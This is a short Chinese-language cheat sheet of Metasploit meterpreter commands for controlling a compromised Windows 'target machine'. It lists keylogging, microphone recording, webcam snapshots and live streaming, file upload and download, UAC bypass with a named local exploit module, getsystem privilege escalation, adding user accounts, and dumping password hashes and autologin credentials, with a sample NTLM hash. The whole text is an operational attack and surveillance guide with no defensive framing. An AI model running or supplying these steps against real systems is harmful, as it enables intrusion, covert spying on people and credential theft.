cat：读取文件内容

cd：靶机目录

cp：复制文件到目标

mv：移动到目标

chmod：修改文件权限（如：chmod 777 shell.elf）

del 或 rm：删除靶机文件

dir：打印靶机目录

mkdir：在靶机上创建目录

rmdir：删除靶机目录

edit：编辑文件

getlwd：打印本地目录

getwd：打倒靶机目录

lcd：更改本地目录

lls：列出本地目录

ls：列出靶机文件目录

lpwd：打印本地目录

pwd：打印工作目录

search：搜索文件详情 search -h

upload：上传文件到靶机

download：从靶机下载文件

screenshot：截图

keyscan_start：启动键盘记录

keyscan_dump：导出键盘

keyscan_stop：停止键盘记录

查看目标靶机存在用户 meterpreter 输入：run post/windows/gather/enum_logged_on_users

创建账户：run getui -u {用户名} msb -p {密码} 例如：run getui -u msb -p 123456

record_mic：录音

-d：是设置录音时长 时间除2

-f：设置未见路径

-p：控制自动播放

-h：查看帮助

例如： record_mic -d 10 -p true

安后门到 meterpreter

getsystem

background

search bypassuac

use exploit/windows/local/bypassuac_windows_store_reg

options

session：查看session号

set session 1

返回到 meterpreter

getsystem

首先获得一个有system权限的meterpreter

有自动登录可：run windows/gather/credentials/windows_autologin

导出数据库本地用户账号：run post/windows/gather/smart_hashdump

例如： | 用户名 | SID | LM哈希: | NTLM哈希1::: | | mb | 1000 | aad3b435b51404eeaad3b435b51404ee |32ed87bdb5fdc5e9cba88547376818d4 |

用 hashdump 获取密码：run hashdump

rdesktop

webcam_list：列出靶机中的所有软，硬件摄像头列表，并编号

webcam_snap：可调用单个软，硬件摄像头拍照，默认调用第一个摄像头

webcam_stream：可调用单个软，硬件摄像头直播，默认调用第一个摄像头

webcam_list

webcam_stream